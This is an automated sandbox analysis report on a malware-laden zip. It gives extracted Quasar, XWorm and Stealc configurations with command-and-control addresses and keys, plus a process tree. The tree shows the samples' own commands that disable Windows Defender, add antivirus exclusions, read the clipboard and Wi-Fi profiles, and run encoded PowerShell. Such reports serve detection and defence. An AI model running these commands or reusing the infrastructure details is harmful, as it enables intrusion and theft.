Analysis

  • max time kernel
    358s
  • max time network
    420s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2025 19:06

Errors

Reason
Machine shutdown

General

  • Target

    241212-wymq6ssnat_pw_infected.zip

  • Size

    8KB

  • MD5

    46e1dda34049ae02d12417a9ca4254a8

  • SHA1

    a9f38b7196980f20c3fee1172538db73f2065284

  • SHA256

    ba3b60449327330b4e55df4528ebcfb7b12cd3e51c16d8b56680314e43d72be2

  • SHA512

    92f17e843d624c20ad16360ed855ff1c02895379a83bd2054374f0a6f9ee3697cdee1b4d38b3833bd2c784f45504541729c29c66275eaa7f137d6d47ab340afb

  • SSDEEP

    192:bxH3A0QJWWqMk3Vp/c8hUwuz4TV3JYih6wEpby+Od7/60i2j:bxHNpfVl2bzFWDE9o/60p

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

70.34.210.80:4782

192.168.1.203:4782

69.232.48.67:4782

Mutex

0d965223-b478-41be-af32-ad5a13d78eba

Attributes
  • encryption_key

    EBD92C218F947CFB9F2E27885F8DFFEAE9079F05

  • install_name

    MSWinpreference.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Skype

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

C2

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes
  • encryption_key

    11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424

  • install_name

    diskutil.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    diskutil

  • subdirectory

    diskutil

Extracted

Family

quasar

Version

1.4.1

Botnet

DDNS

C2

193.161.193.99:32471

Mutex

807f3187-d087-4fff-beff-e73293a32af8

Attributes
  • encryption_key

    81A0C14D4C705B3C678E573C849DE7F6A3671A8B

  • install_name

    jusched.exe

  • log_directory

    CachedLogs

  • reconnect_delay

    3000

  • startup_key

    Java Update Scheduler

  • subdirectory

    Java

Extracted

Family

xworm

C2

among-publication.at.ply.gg:42209

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Extracted

Family

quasar

Version

1.4.0

Botnet

svhost

C2

151.177.61.79:4782

Mutex

a148a6d8-1253-4e62-bc5f-c0242dd62e69

Attributes
  • encryption_key

    5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968

  • install_name

    svhost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svhost

  • subdirectory

    svhost

Extracted

Family

stealc

Botnet

Voov

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

quasar

Version

1.4.1

Botnet

rat1

C2

147.185.221.24:15249

Mutex

da67ff1b-f911-4ad4-a51c-c7c5bd13aeb3

Attributes
  • encryption_key

    AB7A97D9E0F9B0A44190A0D500EAB7AF37629802

  • install_name

    System32.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    System32

  • subdirectory

    System32

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 4 IoCs
  • Detect Xworm Payload 2 IoCs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 13 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • XMRig Miner payload 10 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 41 IoCs
  • Loads dropped DLL 17 IoCs
  • Modifies system executable filetype association 2 TTPs 16 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 57 IoCs
  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241212-wymq6ssnat_pw_infected.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3276
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:396
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
      1⤵
        PID:4428
      • C:\Users\Admin\AppData\Local\Temp\Temp1_New Text Document mod.exse.zip\New Text Document mod.exe
        "C:\Users\Admin\AppData\Local\Temp\Temp1_New Text Document mod.exse.zip\New Text Document mod.exe"
        1⤵
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Windows\System32\a\win.exe
          "C:\Windows\System32\a\win.exe"
          2⤵
          • Executes dropped EXE
          PID:1544
        • C:\Windows\System32\a\Office%202010%20Toolkit.exe
          "C:\Windows\System32\a\Office%202010%20Toolkit.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5104
        • C:\Windows\System32\a\Coc%20Coc.exe
          "C:\Windows\System32\a\Coc%20Coc.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\831C.tmp\831D.tmp\832D.bat C:\Windows\System32\a\Coc%20Coc.exe"
            3⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2448
            • C:\Users\Admin\AppData\Roaming\portable_util.exe
              portable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3936
              • C:\Users\Admin\AppData\Roaming\setup.exe
                "C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3152
                • C:\Users\Admin\AppData\Roaming\setup.exe
                  C:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x318,0x31c,0x320,0x2f4,0x324,0xca8088,0xca8098,0xca80a4
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2500
        • C:\Windows\System32\a\vc_redist.x64.exe
          "C:\Windows\System32\a\vc_redist.x64.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1304
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 520
            3⤵
            • Program crash
            PID:464
        • C:\Windows\System32\a\Google%20Chrome.exe
          "C:\Windows\System32\a\Google%20Chrome.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1892
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9329.tmp\932A.tmp\933B.bat C:\Windows\System32\a\Google%20Chrome.exe"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3508
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" hoiquannet.com/301
              4⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:812
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9cf03cc40,0x7ff9cf03cc4c,0x7ff9cf03cc58
                5⤵
                  PID:3920
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1868 /prefetch:2
                  5⤵
                    PID:3236
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2116 /prefetch:3
                    5⤵
                      PID:804
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2504 /prefetch:8
                      5⤵
                        PID:2068
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3068 /prefetch:1
                        5⤵
                          PID:3656
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3028,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
                          5⤵
                            PID:1848
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4356 /prefetch:1
                            5⤵
                              PID:2072
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4128,i,4468832303499976883,13521726668509163706,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3548 /prefetch:1
                              5⤵
                                PID:1704
                        • C:\Windows\System32\a\xmrig.exe
                          "C:\Windows\System32\a\xmrig.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2520
                        • C:\Windows\System32\a\uncrypted.exe
                          "C:\Windows\System32\a\uncrypted.exe"
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2396
                        • C:\Windows\System32\a\DuckMatter.exe
                          "C:\Windows\System32\a\DuckMatter.exe"
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2764
                        • C:\Windows\System32\a\microsoft-onedrive.exe
                          "C:\Windows\System32\a\microsoft-onedrive.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3624
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1620
                          • C:\Users\Admin\AppData\Local\Temp\Built.exe
                            "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:4736
                            • C:\Users\Admin\AppData\Local\Temp\Built.exe
                              "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1740
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
                                5⤵
                                  PID:1652
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:744
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  5⤵
                                    PID:3972
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4016
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    5⤵
                                      PID:4804
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        6⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:772
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:1084
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2096
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                        5⤵
                                          PID:3644
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                            6⤵
                                              PID:1104
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                            5⤵
                                              PID:3848
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                6⤵
                                                  PID:1272
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                5⤵
                                                  PID:4940
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    6⤵
                                                    • Detects videocard installed
                                                    PID:3752
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  5⤵
                                                    PID:2304
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      6⤵
                                                      • Detects videocard installed
                                                      PID:4988
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                    5⤵
                                                    • Hide Artifacts: Hidden Files and Directories
                                                    PID:5044
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                                      6⤵
                                                      • Views/modifies file attributes
                                                      PID:436
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏  .scr'"
                                                    5⤵
                                                      PID:2768
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏  .scr'
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4248
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      5⤵
                                                        PID:4196
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          6⤵
                                                          • Enumerates processes with tasklist
                                                          PID:1956
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        5⤵
                                                          PID:208
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            6⤵
                                                            • Enumerates processes with tasklist
                                                            PID:4960
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                          5⤵
                                                            PID:4812
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                              6⤵
                                                                PID:2464
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                              5⤵
                                                              • Clipboard Data
                                                              PID:752
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-Clipboard
                                                                6⤵
                                                                • Clipboard Data
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2120
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                              5⤵
                                                                PID:2184
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist /FO LIST
                                                                  6⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:4124
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                5⤵
                                                                  PID:4620
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    6⤵
                                                                      PID:1476
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                    5⤵
                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                    PID:1000
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh wlan show profile
                                                                      6⤵
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:4968
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                    5⤵
                                                                      PID:4856
                                                                      • C:\Windows\system32\systeminfo.exe
                                                                        systeminfo
                                                                        6⤵
                                                                        • Gathers system information
                                                                        PID:4140
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                      5⤵
                                                                        PID:4272
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                          6⤵
                                                                            PID:1596
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMAL